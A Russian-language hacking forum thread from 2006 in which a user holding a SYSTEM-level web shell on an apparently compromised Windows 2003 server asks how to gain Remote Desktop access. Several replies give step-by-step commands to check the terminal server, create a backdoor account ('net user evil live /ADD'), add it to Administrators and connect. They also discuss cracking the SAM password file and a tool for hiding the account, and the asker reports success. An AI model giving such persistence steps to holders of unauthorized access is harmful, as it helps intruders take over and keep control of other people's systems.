ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Удаленный рабочий стол
  #1  
Старый 25.04.2006, 23:32
Аватар для Dima-k17
Dima-k17
Познающий
Регистрация: 15.09.2005
Сообщений: 60
Провел на форуме:
254802

Репутация: 52
Отправить сообщение для Dima-k17 с помощью ICQ
По умолчанию Удаленный рабочий стол

Всем привет! Вопрос, есть удаленная машина, на ней web-shell. Включен "Удаленный рабочий стол", насколько я знаю, логин и пасс такие же, как и на вход в систему, но они не подходят. Скачал sam файл из repair, расшифровал, не подходит ничего(((
Вопрос, как имея web-shell с правами system дописать пользователя на Удаленный рабочий стол?
Система: Win2003Server Enterprise Edition
 
Ответить с цитированием

  #2  
Старый 26.04.2006, 00:03
Аватар для Dronga
Dronga
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464

Репутация: 714


Отправить сообщение для Dronga с помощью ICQ
По умолчанию

Попробуй на своей машине Пуск -> Выполнить -> mstsc /?

Дальше увидишь... Попробуй по поисковикам поглядеть что за RDP файлы подключения.

Если пароли для удаленного рабочего стола совпадают с паролями пользователей, то брать SAM из каталога REPAIR было нелогичным, возможно расшифровал не правильно. Куда проще добавить своего пользователя командой net user /add. Или как альтернативу можно использовать команду ftp и закачать что-нибудь с функциями аналогичными удаленному рабочему столу.
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!

Последний раз редактировалось Dronga; 26.04.2006 в 00:15..
 
Ответить с цитированием

  #3  
Старый 26.04.2006, 10:09
Аватар для Deem3n®
Deem3n®
Постоянный
Регистрация: 19.09.2005
Сообщений: 408
Провел на форуме:
3730496

Репутация: 519
По умолчанию

Ну если у тебя права SYSTEM то сделай следующее:
1) проверь если запущен сервер терминалов (то что включен "удаленный рабочий стол" еще не значит что к машине можно подключатся удаленно):
Цитата:
C:\Documents and Settings\god>qwinsta /server:127.0.0.1
SESSIONNAME USERNAME ID STATE TYPE DEVICE
console Administrator 0 Active wdcon
rdp-tcp 65536 Listen rdpwd
Цитата:
как ... дописать пользователя на Удаленный рабочий стол?
2) Добавь пользователя:
Цитата:
net user evil live /ADD
(live это пароль )
3) Добавь нового пользователя в группу администраторов:
Цитата:
net localgroup Administrators evil /ADD
Теперь подключайся этим пользователем
Цитата:
mstsc -v:x.x.x.x /f
x.x.x.x - ип серва. Теперь можно добавить любого существующего в системе пользователя в группу Remote Desktop Users (как это сделать описано тут).

Последний раз редактировалось Deem3n®; 26.04.2006 в 10:18..
 
Ответить с цитированием

  #4  
Старый 26.04.2006, 11:37
Аватар для Brun
Brun
Участник форума
Регистрация: 21.03.2006
Сообщений: 117
Провел на форуме:
629074

Репутация: 137
Отправить сообщение для Brun с помощью ICQ
По умолчанию

+ что бы невидно было можно мою прогу заюзать
http://forum.antichat.ru/thread17954.html
Похвалился. :-)
 
Ответить с цитированием

  #5  
Старый 26.04.2006, 20:00
Аватар для Dima-k17
Dima-k17
Познающий
Регистрация: 15.09.2005
Сообщений: 60
Провел на форуме:
254802

Репутация: 52
Отправить сообщение для Dima-k17 с помощью ICQ
По умолчанию

=) Всем спасибо за ответы, счас пойду пробовать...
По непонятным причинам не могу запускать приложения при помощи web-shell'a. Он долго думает, а потом выдает ошибку(404) и никакого ответа, использовал r57shell и самописный.
Параллельно вопросы:
1) Почему было нелогичным брать пассы из repair?
2)
Цитата:
Цитата:
net localgroup Administrators evil /ADD
Теперь подключайся этим пользователем
Как можно подключиться этим пользователем, если он не имет доступа к удаленному рабочему столу? По умолчанию только пользователь "Администратор" имеет доступ, но никак не группа "Администраторы"
P.S> У мну просто *nix, поэтому тяжело как-то=)
 
Ответить с цитированием

  #6  
Старый 26.04.2006, 21:49
Аватар для Brun
Brun
Участник форума
Регистрация: 21.03.2006
Сообщений: 117
Провел на форуме:
629074

Репутация: 137
Отправить сообщение для Brun с помощью ICQ
По умолчанию

Цитата:
Почему было нелогичным брать пассы из repair?
Потому что там может и не быть хеша, а если и повезёт, то может быть сложный пароль (хрен подберёш).
Цитата:
Как можно подключиться этим пользователем, если он не имет доступа к удаленному рабочему столу
Читай Большой ФАКю по РАдмину (тут же).
 
Ответить с цитированием

  #7  
Старый 26.04.2006, 22:07
Аватар для Dima-k17
Dima-k17
Познающий
Регистрация: 15.09.2005
Сообщений: 60
Провел на форуме:
254802

Репутация: 52
Отправить сообщение для Dima-k17 с помощью ICQ
По умолчанию

Цитата:
Сообщение от Brun  
Потому что там может и не быть хеша, а если и повезёт, то может быть сложный пароль (хрен подберёш).
Читай Большой ФАКю по РАдмину (тут же).
1)Ясно, вообщем пасс я подобрал, он оказался такойже как и логин, но коннекта нету(((
2) Не в том дело, разговор идет не о РАдмине, а об Удаленном рабочем столе, о том, что заново созданный пользователь не имеет прав для подключения к УРС(Удаленный рабочий стол).
 
Ответить с цитированием

  #8  
Старый 27.04.2006, 09:21
Аватар для Deem3n®
Deem3n®
Постоянный
Регистрация: 19.09.2005
Сообщений: 408
Провел на форуме:
3730496

Репутация: 519
По умолчанию

Цитата:
Сообщение от Dima-k17  
Как можно подключиться этим пользователем, если он не имет доступа к удаленному рабочему столу? По умолчанию только пользователь "Администратор" имеет доступ, но никак не группа "Администраторы"
Можно 100%, проверял локально. Если запущен сервер терминалов то пользователям группы "Администраторы" ("Administrators") разрешено подключатся удаленно.
 
Ответить с цитированием

  #9  
Старый 27.04.2006, 18:33
Аватар для Brun
Brun
Участник форума
Регистрация: 21.03.2006
Сообщений: 117
Провел на форуме:
629074

Репутация: 137
Отправить сообщение для Brun с помощью ICQ
По умолчанию

Dima-k17 для тебя написал

http://forum.antichat.ru/threadedpos...tml#post144129
 
Ответить с цитированием

  #10  
Старый 27.04.2006, 19:35
Аватар для Dima-k17
Dima-k17
Познающий
Регистрация: 15.09.2005
Сообщений: 60
Провел на форуме:
254802

Репутация: 52
Отправить сообщение для Dima-k17 с помощью ICQ
По умолчанию

мммм.... всем спасибо, заработало
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Множественные уязвимости в Mozilla Firefox c411k Защита ОС: вирусы, антивирусы, файрволы. 25 25.04.2006 18:23
Уязвимости в Invision Power Board(U) v1.3 PF1. Вопрос. dukalis(AwP) Форумы 14 19.04.2006 19:40
Есть ли рабочий exploit для ITA Forum v.1.49? dismal Форумы 5 02.01.2006 20:39
Удаленный контроль Ламер----- E-Mail 0 22.07.2004 20:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ